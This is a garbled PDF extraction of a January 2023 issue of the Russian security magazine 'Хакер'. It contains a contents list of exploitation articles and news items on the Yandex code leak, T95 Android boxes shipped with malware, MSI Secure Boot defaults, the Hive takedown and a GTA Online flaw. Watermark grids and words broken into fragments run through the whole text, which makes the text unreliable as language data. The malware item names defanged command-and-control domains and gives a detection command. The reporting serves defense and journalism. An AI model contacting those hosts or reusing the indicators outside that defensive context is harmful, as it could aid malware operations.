книги хакеры / журнал хакер / ха-286_Optimized
.pdf
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
|
- |
|
|
|
|
|
d |
|
|||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
BUY |
|
|
||||||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
m |
w Click |
|
|
|
|
|
|
m |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
. |
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
январь 2023 |
|
df |
|
|
n |
e |
|
|||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
№ 286 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
CONTENTS |
|
|
|
|
|
|
|
|
|
|
|
MEGANews |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||
Самые |
важные события в мире инфосека |
за январь |
|
|
|
||||||||||||||||||||||||||
Художники против ИИ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||
Разбира |
емся с юридичес |
ким статусом |
творчес |
тва нейросетей |
|||||||||||||||||||||||||||
Sad guard |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
Ищем и эксплу |
атируем |
уязвимость |
в драйв ере AdGuard для Windows |
||||||||||||||||||||||||||||
Pivoting District |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||
Как работает |
GRE-пивотинг поверх сетевого |
оборудо |
вания |
|
|
||||||||||||||||||||||||||
ЖэПэО |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
Эксплу |
атируем небезопас |
ные групповые |
|
политики |
|
|
|
||||||||||||||||||||||||
Только для чтения |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||
Пентестим |
Read-only Domain Controllers |
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||
Опасный талисман |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||
Изучаем |
вредонос |
Talisman на практик |
е |
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||
FAQ по физическому пентесту |
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||
Отв ечаем |
на вопр осы будущих взломщиков |
в белой шляпе |
|
|
|||||||||||||||||||||||||||
Мертвая эра |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
Изучаем |
прилож |
ение |
, созданн |
ое в BioEra |
|
|
|
|
|
|
|
|
|
||||||||||||||||||
HTB Health |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||
Эксплу |
ати |
руем |
SSRF от перв оначального |
доступа |
до захвата |
хоста |
|||||||||||||||||||||||||
HTB Shoppy |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||
Повыша |
ем |
привиле |
гии |
через группу |
Docker |
|
|
|
|
|
|
|
|
||||||||||||||||||
HTB UpDown |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
Эксплу |
ати |
руе |
м Race Condition при атаке |
на веб сервер |
|
|
|||||||||||||||||||||||||
HTB Ambassador |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||
Повыша |
е м прив илегии |
через Consul |
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||
ZUI |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Анализи |
руем |
трафик |
с помощью нового быстро |
го |
инстр умен |
та |
|||||||||||||||||||||||||
Титры |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||
Кто делае т этот журнал |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
ПОДПИСКА НА «ХАКЕР»
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Мы благодарим всех, кто поддерживает редакцию и помогает нам компенсировать авторам и редакторам их труд. Без вас «Хакер» не мог бы существовать, и каждый новый подписчик делает его чуть лучше.
Напоминаем, что дает годовая подписка:
год доступа ко всем материалам, уже опубликованным на Xakep.ru;
год доступа к новым статьям, которые выходят по будням;
полное отсутствие рекламы на сайте (при условии, что ты залогинишься); возможность скачивать выходящие
каждый месяц номера в PDF, чтобы читать на любом удобном устройстве;
личную скидку 20%, которую можно использовать для продления
годовой подписки. Скидка накапливается с каждым продлением.
Если по каким-то причинам у тебя еще нет подписки или она скоро кончится, спеши исправить это!
|
|
|
|
hang |
e |
|
|
|
|
||
|
|
|
C |
|
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
||||
|
|
|
|
to |
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
c |
|
|
|
|
o |
|
|
|
|
|
|
|
|
.c |
|
|||
|
. |
|
|
|
|
|
|
|
|||
|
|
p |
|
|
|
|
|
g |
|
|
|
|
|
|
df |
-x |
|
n |
e |
|
|||
|
|
|
|
ha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
c |
|
|
|
o |
|
|
|
|
|
|
|
.c |
|
|||
|
. |
|
|
|
|
|
|
|||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x ha |
|
|
|
|
Мария «Mifrill» Нефёдова nefedova@glc.ru
В этом месяце: хакеры интересу ются возможнос тями ChatGPT, у Яндекса произош ла утечка исходных кодов, на материнских платах MSI не работает Secure Boot, играть в GTA Online может быть опасно , даркнет маркет плей сы выпускают собствен ные Android-приложе ния , а также дру гие интерес ные события прошед шего января .
У ЯНДЕКСА УТЕКЛИ ИСХОДНЫЕ КОДЫ
В конце января на хакерском форуме была опубликова на ссылка на скачива ние дампа , полученного из внутренне го репозитория компании «Яндекс». Общий размер утечки составил 44,7 Гбайт в сжатом виде.
Дамп содержит срезы Git-репозитори ев Яндекса с исходными кодами 79 сервисов и проектов компании , среди которых: поисковый движок (фронтенд и бэкенд), бот индексации страниц , платформа веб аналити ки Yandex Metrika, картогра фичес кая система Yandex Maps, голосовой помощник Алиса , информацион ная система службы поддер жки , Yandex Phone, рекламная платформа Yandex Direct, почтовый сервис Yandex Mail, хранили ще Yandex Disk,
сеть доставки контента , торговая площад ка Yandex Market, облачная плат форма Yandex Cloud, платеж ная система Yandex Pay, Яндекс Поиск, Яндекс Метрика , Яндекс Такси , Яндекс Путешествия , Яндекс 360 и внутренняя сис тема диагности ки Solomon.
Дамп распростра няет ся через торренты и поделен на отдельные архивы (.tar.bz2), по названи ям которых можно идентифици ровать многие сервисы Яндекса. Самые большие архивы — это frontend (18,26 Гбайт), classifeds (4,67 Гбайт), market (4 Гбайт), taxi (3,3 Гбайт) и portal (2,35 Гбайт). Все файлы утечки датированы 24 февраля 2022 года.
Почти полный список файлов (за исключени ем архивов frontend и classifeds) можно найти здесь.
Вскоре в пресс службе Яндекса подтвер дили утечку , подчер кнув, что взлома компании не было, а репозитории нужны лишь для работы с кодом и не пред назначены для хранения персональ ных данных пользовате лей. В компании заявляли , что «не видят какой либо угрозы для данных пользовате лей или работоспособ ности платформы ». Причем , согласно сообщени ям СМИ, данные и вовсе слил инсайдер .
Через несколь ко дней в блоге Яндекса появились первые результаты рас следова ния инциден та.
««Опубликован ные фрагменты действи тельно взяты из нашего внут- реннего репозитория — инстру мента, с помощью которого разработ -
чики компании работают с кодом. При этом содержимое архива соот- ветству ет устарев шей версии репозитория — она отличает ся от акту-
альной версии , которая использует ся нашими сервисами .
Первичный анализ показал, что опубликован ные фрагменты не несут какой либо угрозы для безопасности наших пользовате лей или работоспособ ности сервисов . В то же время мы решили, что сло-
жившаяся ситуация — повод провес ти масштаб ный аудит всего содер- » жимого репозитория », — сообщили в компании .
К сожалению , в ходе аудита обнаружи лось несколь ко случаев серьезно го нарушения политик компании , в том числе принципов Яндекса и правил кор поративной этики . В отчете приводит ся несколь ко примеров таких нарушений .
•Оказалось , что в коде содержались контак тные данные партне ров ком пании. Например , водителей — в некоторых случаях их контакты и номера водительских удостовере ний передавались из одного таксопар ка в другой .
•Были зафиксирова ны случаи , когда логику работы сервисов корректи ровали не алгорит мическим способом , а «костылями ». Через такие «костыли » исправляли отдельные ошибки системы рекомендаций , которая отвечает за дополнитель ные элемен ты поисковой выдачи, и регулирова ли настрой ки поиска по картинкам и видео.
•В сервисе «Яндекс Лавка » существо вала возможность настро ить вручную рекомендации любых товаров без пометки об их рекламном характере .
•Обнаружи лось наличие приори тетной поддер жки для отдельных групп пользовате лей в сервисах «Такси » и «Еда».
•Некото рые части кода содержали слова , которые никак не влияли на работу сервисов , но сами по себе были оскорбитель ны для людей разных рас и националь ностей.
•Опубликован ные фрагменты кода содержали в том числе и тестовые алго ритмы , которые использовались только внутри Яндекса для провер ки кор ректнос ти работы сервисов . Например , для улучшения качества активации ассистента и уменьшения количества ложных срабаты ваний в бета версии для сотрудни ков применя ется настрой ка, которая включает микрофон устройства на несколь ко секунд в случай ный момент без упомина ния Али сы.
Согласно отчету , большинс тво выявленных проблем было связано с попыт ками вручную внести в сервис улучшение или устранить ошибку . «Ошибки — часть жизни . Их не избежать , если у тебя не статич ный, а постоян но развива ющийся продукт », — отмечают в компании .
В связи с этим предста вители компании признали , что им очень стыдно за случив шееся и они должны принес ти извинения всем, кого могла затронуть эта ситуация .
««Один из принципов Яндекса гласит : наша работа строится на прин- ципах честнос ти и прозрачнос ти. Мы исходим из того, что любой внут-
ренний диалог, документ или исходный код при определен ных обсто- ятельствах может стать публичным . И если это случит ся, нам не должно
быть стыдно .
Сейчас нам очень стыдно , и мы приносим извинения нашим поль- » зователям и партне рам», — говорят в Яндексе.
Также в компании пообещали снова вернуть ся к вопросам техноэти ки , возоб новив работу по формирова нию ее стандартов и принципов . «Они будут опуб ликованы на сайте компании и станут частью наших общих политик. Все фраг менты кода, которые противо речат им, будут исправлены », — заверили раз работчики .
200 АТАКОВАННЫХ ОРГАНИЗАЦИЙ
По данным Emsisoft, в 2022 году от атак шифроваль щиков постра дали более 200 крупных аме риканских организа ций в государствен ном, образова тельном и здравоох ранительном сек торах. По сравнению с 2021 годом количество атак вымогателей на муниципаль ные органы власти выросло с 77 случаев до 105.
Экспер ты говорят, что отслеживать атаки на медицинские учреждения сложно в силу «нечет кого раскры тия информации ». И хотя таких инциден тов официаль но насчитыва ется всего 24, последс твия этих взломов могли затронуть более 289 больниц и клиник .
ANDROID-
ПРИСТАВКИ С МАЛВАРЬЮ
Канад ский |
сисадмин |
Даниэль Милишич (Daniel Milisic) обнаружил , что прошив |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
ка купленной |
|
им на Amazon Android-приставки |
T95 была заражена сложной |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||
малварью |
прямо «из коробки ». |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||
Вредонос |
был в прошив ке приставки |
|
T95 с процес сором |
AllWinner H616, |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
которая |
продает |
ся на Amazon, AliExpress |
|
и других |
|
крупных |
маркет плей сах |
|||||||||||||||||||||||||||||||||||||||||||||||||||||
в разных |
|
странах |
|
мира. Милишич отмечает , что такие приставки |
|
проходят |
||||||||||||||||||||||||||||||||||||||||||||||||||||||
совершенно |
неясный |
путь от производс тва в Китае до прилав ков виртуаль |
ных |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||
магазинов . Во многих случаях |
девайсы продают |
ся под разными |
брендами |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||
и названи ями , а четкого |
указания |
их происхожде ния попросту |
нет. |
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||||||||||||||||||||||||||
Кроме того, посколь |
ку такие устройства |
обычно проходят |
через множес тво |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||
рук, поставщи ки и реселлеры |
имеют множес тво возможнос тей |
|
для загрузки |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||
на них кастомых |
ROM, включая потенциаль |
но вредонос ные . |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||||||||||||||||||||||
Иссле дова тель |
|
расска зал , что изучен ное |
им устройство |
T95 использовало |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
ROM на базе Android 10, подписан |
ный |
тестовыми |
ключами , и ADB (Android |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Debug Bridge), открытый |
|
через Ethernet и Wi-Fi. Эта конфигура ция |
уже нас |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||
тораживает |
: ADB может использовать |
ся для подклю чения |
к устройствам |
, неог |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
раниченного |
доступа |
|
к файловой |
системе , выполнения |
команд, установ ки ПО, |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||
изменения |
|
данных |
и удален ного |
управления |
девайсом . Но так как большинс |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||
тво потребитель |
ских |
|
|
устройств |
|
защищены брандма уэром |
, злоумыш |
ленни ки |
||||||||||||||||||||||||||||||||||||||||||||||||||||
вряд ли смогут удален но подклю чить ся к ним через ADB. |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||||||||||||||||||||||||||||
Милишич |
изначаль |
но приобрел |
устройство , чтобы запустить |
на нем DNS |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
sinkhole Pi-hole, защищающую |
|
устройства |
от нежелатель |
ного |
контента , рек |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||
ламы и вредонос ных сайтов без установ ки дополнитель |
ного |
ПО. Однако после |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
анализа |
DNS-запросов |
в Pi-hole он заметил, что устройство |
пыталось подклю |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||
читься к несколь |
ким |
IP-адресам , связан ным |
|
с активной малварью . |
|
|
|
|
|
|
|
|
||||||||||||||||||||||||||||||||||||||||||||||||
Судя по всему , установ ленная |
|
на устройстве |
малварь |
— |
|
это сложный |
||||||||||||||||||||||||||||||||||||||||||||||||||||||
Android-вредонос |
|
CopyCat, обнаружен |
ный |
|
|
экспертами |
из компании |
|
|
Check |
||||||||||||||||||||||||||||||||||||||||||||||||||
Point в 2017 году. Уже тогда аналити ки считали , что малварь |
|
заразила |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
более 14 миллионов |
|
устройств по всему миру, получила root-доступ к 8 мил |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
лионам из них и всего за два месяца принес ла своим авторам |
около 1,5 мил |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
лиона долларов |
США. |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||
«Я |
|
обнаружил |
|
|
слои поверх вредонос ного |
|
ПО, |
|
используя |
|
tcpflow |
|
|
|
||||||||||||||||||||||||||||||||||||||||||||||
«и nethogs для мониторин га трафика , и отследил вредонос |
до вызыва- |
|
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
ющего |
нарушение |
|
процес са /APK, который затем удалил из ROM, — |
|
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
объясня |
ет |
|
|
исследова тель . |
|
— |
Но |
последняя |
часть |
вредонос ного |
|
ПО, |
» |
|||||||||||||||||||||||||||||||||||||||||||||||
которую мне не удалось |
проследить , внедряет |
|
процесс |
system_server и, |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||
похоже, глубоко |
|
интегрирова на в прошив ку ». |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||||||||||||||
Оказалось |
, что вредонос |
упорно пытается |
получить дополнитель |
ную |
|
полезную |
||||||||||||||||||||||||||||||||||||||||||||||||||||||
нагрузку |
с сайтов ycxrl[.]com, cbphe[.]com и cbpheback[.]com. Посколь |
ку соз |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
дать чистую |
прошив ку для замены вредонос ной |
оказалось |
трудно , |
Милишич |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
решил изменить |
|
DNS C&C, чтобы направить |
запросы |
через веб сервер Pi-hole |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
и заблокиро вать |
их. |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||
Иссле дова тель |
|
отмечает , что ему неизвес тно , многие ли Android-приставки |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
этой модели на Amazon заражены , и он не знает , как именно это произош |
ло , |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
но всем пользовате лям |
|
T95 он рекомендует |
выполнить |
два простых шага, что |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
бы точно очистить |
свое устройство |
и нейтра лизо вать |
вредонос ное ПО, которое |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||
может на нем работать: |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||||||||||
• перезаг |
рузить |
|
девайс |
в |
|
режиме |
восста нов ления |
|
или |
|
выполнить |
|
|
сброс |
||||||||||||||||||||||||||||||||||||||||||||||
к заводским |
настрой кам через меню; |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||||||||||
• после перезагрузки |
|
подклю чить ся к ADB через USB |
|
или |
Wi-Fi-Ethernet |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||
и запустить |
созданный |
им скрипт. |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Чтобы убедить ся, что малварь обезвре жена, следует запустить adb logcat | grep Corejava и удостоверить ся, что команду chmod выполнить не удалось .
Учитывая , что такие устройства весьма недороги , исследова тель отмечает , что, возможно , более разумным выходом будет вообще прекратить исполь зовать их.
40 000 000 ДОЛЛАРОВ НА ОТДЫХ И ЕДУ
СМИ выяснили , что только за девять последних месяцев руководство обанкро тившейся крип товалютой биржи FTX потратило более 40 миллионов долларов на отели , еду, развле чения
и перелеты .
Около 5,8 миллиона долларов было потрачено на отель Albany — курорт на берегу океана
с собствен ной пристанью для яхт и полем для гольфа , где бывший глава FTX Сэм Бэн кман Фрид проживал в пентха усе .
6,9 миллиона долларов были потрачены на «еду и развле чения». Почти половина этой сум мы — услуги обществен ного питания, причем 1,4 миллиона долларов пришлось на питание сотрудников в отеле Hyatt.
У MSI НЕ РАБОТАЕТ
SECURE BOOT
Новозе ландский студент Давид Потоцкий (Dawid Potocki) случай но обнаружил , что на 290 моделях материнских плат MSI по умолчанию не работает функция Secure Boot, отвечающая за безопасную загрузку UEFI. Это означает , что на уязвимых машинах можно запустить любой образ ОС независимо от того, подписан ли он и подлинная ли подпись .
Иссле дователь нашел проблему случай но, во время настрой ки нового компьюте ра . «Я обнаружил , что прошив ка принима ет любой образ ОС,
который я ей предос тавляю , неважно , доверенный |
он или нет», — писал он |
|||||||||||||||
в своем блоге . |
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
Оказалось |
, что еще в январе 2022 года компания |
MSI обновила |
настрой ки |
|||||||||||||
в разделе |
Secure Boot в своем UEFI/BIOS, изменив |
значения |
по умолчанию |
|||||||||||||
с релизом новой прошив ки . В итоге все значения |
в подразде ле Image Execution |
|||||||||||||||
Policy оказались |
установ лены |
на Always |
Execute |
(«Всегда |
выполнять |
»). |
||||||||||
Это означает |
, что, если вредонос ное |
ПО изменило |
загрузчик |
ОС, MSI |
||||||||||||
UEFI/BIOS все равно загрузит |
вредонос ный |
образ, даже если с его криптогра |
||||||||||||||
фической подписью |
явно не все в порядке . |
|
|
|
|
|
|
|
|
Потоц кий говорит, что настрой ки , конечно , нужно исправить на более разум ные, установив значение Deny Execute («Запретить выполнение ») как минимум для Removable Media и Fixed Media.
Однако , обнаружив проблему на своей машине, Потоцкий пошел дальше и решил выяснить , только ли его материнскую плату «улучшили » разработ чики MSI. Оказалось , что проблема куда масштаб нее : произво дитель изменил нас
тройки на небезопас ные для более чем 290 моделей материнских плат (для процес соров как Intel, так и AMD), полный список которых можно найти здесь.
« |
«Какие бы функции |
безопасности |
вы ни включали , не верьте , что они |
|
|||||
работают , ПРОВЕРЬ ТЕ ИХ! Каким то образом |
я оказал ся первым , кто |
» |
|||||||
|
задокумен тировал |
эту проблему |
, |
хотя впервые |
она возникла |
где то |
|||
|
|
||||||||
|
в третьем квартале |
|
2021 года», — заключа ет исследова тель . |
|
|
Всем пользовате лям материнских плат MSI Потоцкий рекомендует проверить настрой ки и в случае необходимос ти установить безопасные значения в раз
деле Image Execution Policy.
ПРАВООХРАНИТЕЛИ ВЗЛОМАЛИ HIVE
Правоох ранительные органы тринад цати стран мира приняли участие в операции по лик видации инфраструктуры RaaS-шифроваль щика Hive. Министерс тво юстиции США, ФБР и Европол заявили , что сумели проник нуть в инфраструктуру хак группы еще в июле прошлого года, регулярно перехватыва ли ключи дешифрования и предот вратили выплату выкупов
на общую сумму около 130 миллионов |
долларов |
. |
|
|
|
|
|
|
|
|
|||||
«Незаметно для Hive в ходе киберзасады |
наша следствен ная |
группа |
|||||||||||||
→на законных |
основани ях проник ла в сеть Hive и скрывалась |
там несколь |
ко |
||||||||||||
месяцев, неоднократ |
но |
перехватывая |
ключи дешифрования |
и передавая |
их |
||||||||||
жертвам , чтобы освободить |
их от вымогателей . В течение несколь |
ких месяцев |
|||||||||||||
мы помогали жертвам |
победить злоумыш ленни ков |
и лишали Hive прибылей |
|||||||||||||
от вымогатель |
ства . Проще говоря, мы хакнули |
хакеров, используя |
законные |
||||||||||||
средства . Мы побили Hive их же оружием |
и разрушили |
их бизнес модель», |
|
— заявила заместитель генерального прокуро ра Лиза Монако на пресс конферен ции .
GTA ONLINE
НЕБЕЗОПАСНА ДЛЯ ИГРОКОВ
В игре обнаружи ли уязвимость , которая может привес ти к потере игрового прогресса , краже игровых денег, бану и другим неприят ным последс твиям. Эксперты предуп редили, что еще немного и экспло ит для этой проблемы поз волит добиться удален ного выполнения кода через GTA Online, то есть хакеры смогут удален но запустить малварь на компьюте рах с работающей игрой.
20 января об этой уязвимос ти сообщил Twitter-аккаунт Tez2, посвящен ный играм Rockstar Games. По его информации , множес тво игроков GTA Online жаловались на потерю прогресса , баны и кики, с которыми им пришлось стол кнуться в последнее время . Форумы поддер жки Rockstar Games действи тель но оказались завалены многочис ленными сообщени ями пользовате лей о проблемах с учетными записями .
Продолжение статьи →
|
|
|
|
hang |
e |
|
|
|
|
||
|
|
|
C |
|
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
||||
|
|
|
|
to |
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
c |
|
|
|
|
o |
|
|
. |
|
|
|
|
